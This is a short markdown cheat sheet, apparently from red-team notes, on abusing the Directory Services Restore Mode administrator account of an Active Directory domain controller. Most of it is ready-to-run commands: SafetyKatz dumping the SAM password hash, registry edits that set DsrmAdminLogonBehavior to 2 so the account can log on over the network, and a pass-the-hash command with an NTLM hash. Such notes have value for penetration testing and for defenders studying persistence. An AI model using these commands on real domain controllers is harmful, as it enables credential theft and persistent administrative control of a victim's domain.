# dsrm

DSRM is Directory Services Restore Mode. There is a local administrator on every DC called "Administrator" whose password is the DSRM password.

DSRM password (SafeModePassword) is saved when a server is promoted to Domain Controller and it is rarely changed. After altering the configuration on the DC, it is possible to pass the NTLM hash of this user to access the DC.

## Methodology

1. Dump DSRM password
2. Change logon behavior for the DSRM account.
3. Pass-The-Hash.

## Binaries

> \[!INFO] Remember to follow the Binaries methodology

### SafetyKatz

**Dump local admin DSRM password on the domain controller:**

```batchfile
SafetyKatz.exe '"token::elevate" "lsadump::sam"'
```

Since it is the 'local' administrator of the DC, we can pass the hash to authenticate. But, the Logon Behavior for the DSRM account needs to be changed before we can use its hash

**Change login behavior for the local admin on the DC:**

```powershell
New-ItemProperty “HKLM:\System\CurrentControlSet\Control\Lsa\” -Name “DsrmAdminLogonBehavior” -Value 2 -PropertyType DWORD
```

```
winrs -r:dcorp-dc cmd
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "DsrmAdminLogonBehavior" /t REG_DWORD /d 2 /f
```

**If property already exists**

```powershell
Set-ItemProperty “HKLM:\System\CurrentControlSet\Control\Lsa\” -Name “DsrmAdminLogonBehavior” -Value 2
```

**Pass The hash:**

```batchfile
SafetyKatz.exe '"sekurlsa::pth /domain:contoso.local /user:Administrator /ntlm:917ecdd1b4287f7051542d0241900cf0 /run:powershell.exe"'
```